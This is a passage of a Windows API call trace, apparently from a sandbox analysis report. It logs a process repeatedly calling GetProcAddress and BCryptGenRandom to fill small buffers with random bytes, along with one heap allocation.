pbBuffer=0x46ffdc8) returned 0x0 [0199.650] GetProcessHeap () returned 0x440000 [0199.650] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01d50 [0199.651] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.651] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d51, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a01d51) returned 0x0 [0199.651] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.653] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.653] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.653] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d77, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a01d77) returned 0x0 [0199.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01da6, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a01da6) returned 0x0 [0199.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 